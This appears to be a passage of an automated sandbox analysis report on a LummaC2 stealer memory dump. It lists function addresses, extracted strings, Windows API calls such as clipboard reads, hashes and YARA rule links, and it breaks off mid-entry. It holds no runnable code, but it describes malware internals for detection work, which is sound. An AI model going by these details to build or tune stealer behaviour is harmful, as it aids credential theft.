API String ID: 0-2664314784
Opcode ID: a07b29a89197412665c3fc062086f3d59076a29fee0857c192ed5ed0fd1a9ee1
Instruction ID: cd300477c5c608c521949fff9f63d70d8e555145ed9ff3e48effc05a228f1c78
Opcode Fuzzy Hash: a07b29a89197412665c3fc062086f3d59076a29fee0857c192ed5ed0fd1a9ee1
Instruction Fuzzy Hash: 145213B1A087418BD724CF28CC557AFB7E5EFD5314F18CA2CE49A872A1EB749801CB52

Function 00A71A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

%, xrefs: 00A71E31
], xrefs: 00A71DB7
;, xrefs: 00A71B11
', xrefs: 00A71AA7
c, xrefs: 00A72059
1, xrefs: 00A71C89
U, xrefs: 00A7205E

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 5a1efeeffaa57e95b6def37b5919b325574e67bd7a9726e35c20776e13ce2ba3
Instruction ID: cdb6bc0d9e6d87892276daa9e7a6636c50d5cd1bfcc6b768cfce4d8e4e685dd4
Opcode Fuzzy Hash: 5a1efeeffaa57e95b6def37b5919b325574e67bd7a9726e35c20776e13ce2ba3
Instruction Fuzzy Hash: D812D37160C7908BC7249F3888953AFBBE1AB85324F18CB2EE5ED873D1D6358945CB42

Function 00A91B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A91B24
GetClipboardData.USER32 ref: 00A91B3F
GlobalLock.KERNEL32 ref: 00A91B58
GetWindowLongW.USER32 ref: 00A91BC7
GlobalUnlock.KERNEL32 ref: 00A91CE7
CloseClipboard.USER32 ref: 00A91CF4

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 2f2a91c568c47be12d22ac29da1cc4dffceac08e3dd20cabb15a1bd369896903
Instruction ID: 7fe83f60e45dc99710a65c8f8ab4edbe68ac110557b48e1b302f7942d47fb942
Opcode Fuzzy Hash: 2f2a91c568c47be12d22ac29da1cc4dffceac08e3dd20cabb15a1bd369896903
Instruction Fuzzy Hash: 2E51DF7264C7828FC304AFBC888525EBAE1ABC6224F184B2DE5E5873E1D6788545C393

Function 00A69290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

C, xrefs: 00A695B5
CM, xrefs: 00A69608
kj, xrefs: 00A69458
clfg, xrefs: 00A692E2
Egx|, xrefs: 00A692CA
RRP\, xrefs: 00A696DE

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction ID: ddcfbaad57cce24d970efbce0780ab3c6dbcb0729ad835134bb02e1c9031e7c3
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: DCC1287120C3908FD316CF3984A03ABBBE29FD7215F19896DE4E54F396D639490ACB52

Function 00A78095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

d, xrefs: 00A78726
', xrefs: 00A79102
Q230, xrefs: 00A78B93
(, xrefs: 00A782E1
K, xrefs: 00A78162

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 7697da3dd70f145a37b061bce91a4f6fac4b47823379ec6146b5ce30619941f6
Instruction ID: 295b4f29ecaa38ba53123fd224708c42c7c285197b49d4904fc1c2aaa892a66e
Opcode Fuzzy Hash: 7697da3dd70f145a37b061bce91a4f6fac4b47823379ec6146b5ce30619941f6
Instruction Fuzzy Hash: B99239716083428BD724CF28C8917ABB7E2FFD6354F18C96DE4C98B291EB788945C752

Function 00A826D3 Relevance: 7.0, Strings: 5, Instructions: 769COMMON

Download Yara Rule

Strings

r~, xrefs: 00A82A16
1{, xrefs: 00A82A0E
?<, xrefs: 00A82AB6
0, xrefs: 00A82888
zw, xrefs: 00A82A06

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$?<$r~$zw
API String ID: 0-3209727026
Opcode ID: e66035b3ae5d9959b8a114e512edb15eaf174bc0b33043a71ea3aa311a5ee477
Instruction ID: 5a2cb3e1b406939b03fbf402c63530705e68353756a4823119e5bd9e584130c6
Opcode Fuzzy Hash: e66035b3ae5d9959b8a114e512edb15eaf174bc0b33043a71ea3aa311a5ee477
Instruction Fuzzy Hash: 0842E375608351CFD728CF28D89176ABBE1FBCA300F19896CE8D59B391D7749806CB92

Function 00A870F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

p, xrefs: 00A872D9
=&2), xrefs: 00A874BA
LL, xrefs: 00A872E0
>.8, xrefs: 00A874AC

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 0105d41ababa9c9e8e2aa4caf19f1ad76d9a12025c223c2ea3fa529ea8cac7e9
Instruction ID: 33c10f6a1eb020ad76a3a8a8305ef6275cc89b4606d7ee5694ff46b8935798ae
Opcode Fuzzy Hash: 0105d41ababa9c9e8e2aa4caf19f1ad76d9a12025c223c2ea3fa529ea8cac7e9
Instruction Fuzzy Hash: A5421775E04612CFDB18CF68D85166EB7B2FF85310F298229D456AB395EB34A812CBD0

Function 00A6C97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

r~, xrefs: 00A6D02F
zw, xrefs: 00A6D019
1{, xrefs: 00A6D024
?<, xrefs: 00A6D0C2

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: 17968fb16afc0d973d9ce465180ca807c6c4d12c6bcbef0f7e17e51dc1328502
Instruction ID: a6c30b78fc0110f55432aa8db73686c0f5f74a832a638608dae0b30ae934357d
Opcode Fuzzy Hash: 17968fb16afc0d973d9ce465180ca807c6c4d12c6bcbef0f7e17e51dc1328502
Instruction Fuzzy Hash: 8202BAB020D3C28AD735CF25D4947EFBBE1EBD6358F18896CC8D99B242C77845468B92

Function 00A7C205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

|r, xrefs: 00A7C5CC
g`a, xrefs: 00A7C864
./, xrefs: 00A7C544
{x, xrefs: 00A7C6B5

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: d2416bfbb6e36dc0dfceafb34c2ed334422c1df5c8cf5c65a003dcb18b5b592a
Instruction ID: e4b0158f1046328ef3a19873b969702048af12e6f3bf2c6a4bd446a2902c7325
Opcode Fuzzy Hash: d2416bfbb6e36dc0dfceafb34c2ed334422c1df5c8cf5c65a003dcb18b5b592a
Instruction Fuzzy Hash: E1F12AB7A5C3109BD308DF699C4255FFAE2EBD4314F19C93CE8D89B345DA3886058B86

Function 00A91D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00A91D59
GetSystemMetrics.USER32 ref: 00A91D69

Strings

, xrefs: 00A91E56

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 2ade6033bdaf75307d6be81b3d3488f1d35e2d0ed6cb3832b2758c31e14af5e6
Instruction ID: 67792f96a7a16073fbcb7a1360a5a4d3047fd2a18037c1ea24c1d6b7a4e2e19e
Opcode Fuzzy Hash: 2ade6033bdaf75307d6be81b3d3488f1d35e2d0ed6cb3832b2758c31e14af5e6
Instruction Fuzzy Hash: D4A16AB05593818FD370DF28C488B9BBBF0BB86308F54892DD5989B690D7B59448CF93

Function 00A859B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

/V, xrefs: 00A85A57
Y\, xrefs: 00A85A5F
U+, xrefs: 00A85A4F
!J, xrefs: 00A85A67

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 475c67f9bdc0c87a24594326944bcbf6a67df99d61b0b8244a54a32b3de4110d
Instruction ID: 9aba43d4cf8732fbf3c7e9db69dfbce7ae377d37c429653dc62d35781ae088ba
Opcode Fuzzy Hash: 475c67f9bdc0c87a24594326944bcbf6a67df99d61b0b8244a54a32b3de4110d
Instruction Fuzzy Hash: 2CE120B5A08301DFE724DF64E88176BB7F1FB86304F54892CE5D54B2A2EB348806CB56

Function 00A6AB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

a|}r, xrefs: 00A6AC66
tefr, xrefs: 00A6AD64, 00A6AD20, 00A6AEE3, 00A6AED7, 00A6AF78, 00A6AFAC, 00A6AF81
tefr, xrefs: 00A6ADEE
nww, xrefs: 00A6AD87

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: 623b1eaa7d29f324d89907b06da93b2af34dcdbfc14f4f1cd87777d6da0d569b
Instruction ID: 576ff3d46b62bc58c7ab9b6e0e44084727e71280e97e28737c35feb852ab6fda
Opcode Fuzzy Hash: 623b1eaa7d29f324d89907b06da93b2af34dcdbfc14f4f1cd87777d6da0d569b
Instruction Fuzzy Hash: 0CC1E5B124C3504BC324EF2488512ABFBF2DBE2304F58896CE5D59F346E675880A8B57

Function 00A8C894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00A8CC43
0, xrefs: 00A8CB61
@, xrefs: 00A8CBB3
d, xrefs: 00A8CACA

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 75bf18bc58832b1a116f99cb1618504bfdb4942ccdb8bceeee0a3a67f0685519
Instruction ID: a47c8e8633dad210544b570079fa19f9f50c100cbd9b9fff45ea608bccb368a4
Opcode Fuzzy Hash: 75bf18bc58832b1a116f99cb1618504bfdb4942ccdb8bceeee0a3a67f0685519
Instruction Fuzzy Hash: E37137B020C3824BD318DF3984A133BFFE1AFD6754F68896DE4D68B292D67485058B62

Function 00A8B695 Relevance: 5.1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

Strings

^_[E, xrefs: 00A8B7D9
5++r, xrefs: 00A8B722
O>8), xrefs: 00A8B7F9
]>8), xrefs: 00A8B820

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 5++r$O>8)$]>8)$^_[E
API String ID: 0-2089560213
Opcode ID: 7b9d9b2f986fa254a18e1bdcbb036104d9a92dd66716a6e45ae124987505b25f
Instruction ID: 9171adeec82791635836bf4833c51faa0dd86679849b26c5171cb64223dc8079
Opcode Fuzzy Hash: 7b9d9b2f986fa254a18e1bdcbb036104d9a92dd66716a6e45ae124987505b25f
Instruction Fuzzy Hash: 2C51F87551D3C14BD7258F39C8A43EBBBE1AFD2304F2888ADD0C987241DF79450A8B66

Function 00A6D35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00A6D368
CoUninitialize.OLE32 ref: 00A6D7A4

Strings

(P, xrefs: 00A6D7B2

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: 3c9f878651b8ae1fee008680f5230b72d38b18a451ed839db945eb00434985a5
Instruction ID: 7288ddbd52742b8f0707fb60d5a57fd535567cef4b06a37a8c5c532dda89d1d9
Opcode Fuzzy Hash: 3c9f878651b8ae1fee008680f5230b72d38b18a451ed839db945eb00434985a5
Instruction Fuzzy Hash: 3B22F171A4D3C28AD331CF39D8907AABFE0AF96348F188A9DD4D95B242D7354506CB92

Function 00A9A800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

<Y?., xrefs: 00A9ABDB
f, xrefs: 00A9AA31
@Y?., xrefs: 00A9AC15

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: 22b3f2277a6f332b41d7504b54575cf4c8fa2a091faf809722c085113c6a7c9e
Instruction ID: e56af9e0a828a01273051e9f422fa86913cd96a0722f4dfc401ab00aa11cd05d
Opcode Fuzzy Hash: 22b3f2277a6f332b41d7504b54575cf4c8fa2a091faf809722c085113c6a7c9e
Instruction Fuzzy Hash: 4C22D0717083419FDB14CF28C991B2BBBE2BBE9314F188A2DE49597292D735DC05CB92

Function 00A69710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

v~, xrefs: 00A69A04
p, xrefs: 00A69936
HVKG, xrefs: 00A697A0

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 66289baafd516b3bb6b8dc91e18825897d27890c679421371d21a3b79ab0bdbe
Instruction ID: cd0d84a6071f4d621182b9f0c536b00bf0dd12b5468ddd4ffae0f213d21d667b
Opcode Fuzzy Hash: 66289baafd516b3bb6b8dc91e18825897d27890c679421371d21a3b79ab0bdbe
Instruction Fuzzy Hash: BBB124B160C3408BE314CF69D8916ABBBF5EBD2314F14496CE5E18B392D778D90ACB52

Function 00A8BF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

L,2H, xrefs: 00A8BF4D
@a, xrefs: 00A8C2AF
u, xrefs: 00A8C364

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: 967f2be5549a81fad43a6a95acd80f6ad607d7363d8d2b0182d56d0336cc000b
Instruction ID: 2c05954582e4acbf23ed331064de56ee2c88506f9e67696ab6a6c2ed2fe8d4cd
Opcode Fuzzy Hash: 967f2be5549a81fad43a6a95acd80f6ad607d7363d8d2b0182d56d0336cc000b
Instruction Fuzzy Hash: 4D91D07050C3C18FD729CF3984607ABBBE1AFAB314F18899DE0D997282D7358506CB26

Function 00A8C984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00A8CC43
@, xrefs: 00A8CBB3
d, xrefs: 00A8CACA

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 5dd402725ccd08dbe1a897cd5a8864a5e73b7e2e88f2d4e796e386864d656304
Instruction ID: 2a89465e9a11faca78ae3159b202fad210384de209d852651aca6264867f5dec
Opcode Fuzzy Hash: 5dd402725ccd08dbe1a897cd5a8864a5e73b7e2e88f2d4e796e386864d656304
Instruction Fuzzy Hash: 1B7147B020C3924BD318DF3984A133BFFD1AFD6754F68896DE4D68B292D67485058B62

Function 00A8C9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00A8CC43
@, xrefs: 00A8CBB3
d, xrefs: 00A8CACA

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 4b824eb9e63d14fd5364703981bd7565c7bd590b9e3e0841a62f47b7d2a660c3
Instruction ID: 76ae4f8334fdcd103423a26502706f6d9955935b0757658e1580dbf335f93638
Opcode Fuzzy Hash: 4b824eb9e63d14fd5364703981bd7565c7bd590b9e3e0841a62f47b7d2a660c3
Instruction Fuzzy Hash: 0A7137B020C3824BD318DF3984A133BFFD1AFD6754F68896DE4D68B291D674C5468B62

Function 00A8C9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00A8CC43
@, xrefs: 00A8CBB3
d, xrefs: 00A8CACA

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

